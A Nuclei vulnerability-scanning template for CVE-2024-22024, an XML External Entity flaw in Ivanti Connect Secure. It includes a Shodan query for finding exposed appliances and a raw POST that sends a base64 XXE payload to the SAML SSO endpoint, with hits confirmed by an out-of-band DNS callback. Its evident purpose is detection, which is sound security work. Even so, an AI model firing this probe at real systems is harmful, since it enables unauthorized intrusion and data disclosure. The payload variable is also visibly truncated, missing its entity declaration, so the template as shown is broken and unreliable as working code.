id: CVE-2024-22024 info: name: Ivanti Connect Secure - XXE author: watchTowr severity: high description: | Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection. impact: | Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution. remediation: | Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability. reference: - https://labs.watchtowr.com/are-we-now-part-of-ivanti/ - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1 metadata: max-request: 1 vendor: ivanti product: "connect_secure" shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,xxe,ivanti variables: payload: ' %watchTowr;]>' http: - raw: - | POST /dana-na/auth/saml-sso.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded SAMLRequest={{base64(payload)}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: body words: - '/dana-na/' - 'WriteCSS' condition: and # digest: 4a0a00473045022100b30b610e83925ba39d984d8e235e97014a180a7e945b4a35faec7386faa1b79b022026685bd4cdedbb97d9918ebdd5f362731b82b6368331fc30b6dcbfef0acaccdb:922c64590222798bb761d5b6d8e72950